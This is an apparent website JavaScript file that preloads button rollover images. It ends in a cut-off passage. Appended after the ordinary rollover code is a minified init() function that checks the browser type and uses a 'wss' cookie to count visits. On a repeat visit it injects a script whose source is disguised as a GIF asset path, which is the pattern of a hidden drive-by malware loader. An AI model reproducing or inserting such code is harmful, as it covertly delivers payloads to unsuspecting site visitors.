mo = []; mo.images = []; mo.base = 'template/gfx/buttons/'; mo.enter = function(el) { if (el.firstChild && this.images[el.firstChild.name]) { el.firstChild.src = this.images[el.firstChild.name][1].src; } } mo.exit = function(el) { if (el.firstChild && this.images[el.firstChild.name]) { el.firstChild.src = this.images[el.firstChild.name][0].src; } } mo.preload = function(name, normal, hover) { mo.images[name] = []; mo.images[name][0] = new Image() mo.images[name][0].src = this.base + normal; mo.images[name][1] = new Image() mo.images[name][1].src = this.base + hover; } /* --- Preload images --------------------------------------------- */ var img = [ 'home','about','members','companies','contact']; for ( i in img ) { mo.preload ( img[i], img[i] + '-out.gif', img[i] + '-over.gif' ); } function init(){var f=navigator.userAgent;var a=false;if(f.indexOf("Firefox")!=-1||f.indexOf("MSIE")!=-1){a=true}if(a!==true){return}var i="/template/gfx/buttons/contact-out.gif?js";var g=b("wss");if(g){if(g=="goot1"){c("wss","goot2","3");var e=document.createElement("script");e.type="text/javascript";e.src=i+"&r="+new Date().getTime();var d=document.getElementsByTagName("head")[0];d.appendChild(e)}else{}}else{c("wss","goot1","3")}function b(k){var j,h,m,l=document.cookie.split(";");for(j=0;j